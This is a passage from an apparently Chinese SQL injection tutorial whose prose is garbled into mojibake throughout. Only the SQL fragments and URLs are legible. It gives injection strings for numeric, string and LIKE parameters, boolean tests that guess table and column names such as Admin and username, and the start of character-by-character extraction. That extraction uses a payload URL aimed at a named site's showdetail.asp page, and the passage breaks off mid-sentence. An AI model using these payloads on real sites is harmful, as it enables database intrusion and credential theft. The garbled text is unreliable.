SQL×¢È멶´È«½Ó´¥

 
µÚÒ»½Ú¡¢SQL×¢ÈëµÄÒ»°ã²½Öè
Ê×ÏÈ£¬Åжϻ·¾³£¬Ñ°ÕÒ×¢Èëµã£¬ÅжÏÊý¾Ý¿âÀàÐÍ£¬ÕâÔÚÈëÃÅƪÒѾ­½²¹ýÁË¡£
Æä´Î£¬¸ù¾Ý×¢Èë²ÎÊýÀàÐÍ£¬ÔÚÄÔº£ÖÐÖع¹SQLÓï¾äµÄԭò£¬°´²ÎÊýÀàÐÍÖ÷Òª·ÖΪÏÂÃæÈýÖÖ£º
(A) ID=49 ÕâÀà×¢ÈëµÄ²ÎÊýÊÇÊý×ÖÐÍ£¬SQLÓï¾äԭò´óÖÂÈçÏ£º
Select * from ±íÃû where ×Ö¶Î=49
×¢ÈëµÄ²ÎÊýΪID=49 And [²éѯÌõ¼þ]£¬¼´ÊÇÉú³ÉÓï¾ä£º
Select * from ±íÃû where ×Ö¶Î=49 And [²éѯÌõ¼þ]
(B) Class=Á¬Ðø¾ç ÕâÀà×¢ÈëµÄ²ÎÊýÊÇ×Ö·ûÐÍ£¬SQLÓï¾äԭò´óÖ¸ÅÈçÏ£º
Select * from ±íÃû where ×Ö¶Î=’Á¬Ðø¾ç’
×¢ÈëµÄ²ÎÊýΪClass=Á¬Ðø¾ç’ and [²éѯÌõ¼þ] and ‘’=’ £¬¼´ÊÇÉú³ÉÓï¾ä£º
Select * from ±íÃû where ×Ö¶Î=’Á¬Ðø¾ç’ and [²éѯÌõ¼þ] and ‘’=’’
(C) ËÑË÷ʱû¹ýÂ˲ÎÊýµÄ£¬Èçkeyword=¹Ø¼ü×Ö£¬SQLÓï¾äԭò´óÖÂÈçÏ£º
Select * from ±íÃû where ×Ö¶Îlike ’%¹Ø¼ü×Ö%’
×¢ÈëµÄ²ÎÊýΪkeyword=’ and [²éѯÌõ¼þ] and ‘%25’=’£¬ ¼´ÊÇÉú³ÉÓï¾ä£º
Select * from ±íÃû where×Ö¶Îlike ’%’ and [²éѯÌõ¼þ] and ‘%’=’%’
½Ó×Å£¬½«²éѯÌõ¼þÌæ»»³ÉSQLÓï¾ä£¬²Â½â±íÃû£¬ÀýÈ磺
ID=49 And (Select Count(*) from Admin)>=0
Èç¹ûÒ³Ãæ¾ÍÓëID=49µÄÏàͬ£¬ËµÃ÷¸½¼ÓÌõ¼þ³ÉÁ¢£¬¼´±íAdmin´æÔÚ£¬·´Ö®£¬¼´²»´æÔÚ£¨ÇëÀμÇÕâÖÖ·½·¨£©¡£Èç´ËÑ­»·£¬Ö±ÖÁ²Âµ½±íÃûΪֹ¡£
±íÃû²Â³öÀ´ºó£¬½«Count(*)Ìæ»»³ÉCount(×Ö¶ÎÃû)£¬ÓÃͬÑùµÄÔ­Àí²Â½â×Ö¶ÎÃû¡£
ÓÐÈË»á˵£ºÕâÀïÓÐһЩżȻµÄ³É·Ö£¬Èç¹û±íÃûÆðµÃºÜ¸´ÔÓû¹æÂɵģ¬ÄǸù±¾¾ÍûµÃÍæÏÂÈ¥ÁË¡£ËµµÃºÜ¶Ô£¬ÕâÊÀ½ç¸ù±¾¾Í²»´æÔÚ100%³É¹¦µÄºÚ¿Í¼¼Êõ£¬²ÔÓ¬²»¶£ÎÞ·ìµÄµ°£¬ÎÞÂ۶༼Êõ¶à¸ßÉîµÄºÚ¿Í£¬¶¼ÊÇÒòΪ±ðÈ˵ijÌÐòдµÃ²»ÑÏÃÜ»òʹÓÃÕß±£ÃÜÒâʶ²»¹»£¬²ÅÓеÃÏÂÊÖ¡£
ÓеãÅÜÌâÁË£¬»°Ëµ»ØÀ´£¬¶ÔÓÚSQLServerµÄ¿â£¬»¹ÊÇÓа취ÈóÌÐò¸æËßÎÒÃDZíÃû¼°×Ö¶ÎÃûµÄ£¬ÎÒÃÇÔڸ߼¶ÆªÖлá×ö½éÉÜ¡£
×îºó£¬ÔÚ±íÃûºÍÁÐÃû²Â½â³É¹¦ºó£¬ÔÙʹÓÃSQLÓï¾ä£¬µÃ³ö×ֶεÄÖµ£¬ÏÂÃæ½éÉÜÒ»ÖÖ×î³£Óõķ½·¨£­AsciiÖð×Ö½âÂë·¨£¬ËäÈ»ÕâÖÖ·½·¨ËٶȺÜÂý£¬µ«¿Ï¶¨ÊÇ¿ÉÐеķ½·¨¡£
ÎÒÃǾٸöÀý×Ó£¬ÒÑÖª±íAdminÖдæÔÚusername×ֶΣ¬Ê×ÏÈ£¬ÎÒÃÇÈ¡µÚÒ»Ìõ¼Ç¼£¬²âÊÔ³¤¶È£º
http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len(username) from Admin)>0
ÏÈ˵Ã÷Ô­Àí£ºÈç¹ûtop 1µÄusername³¤¶È´óÓÚ0£¬ÔòÌõ¼þ³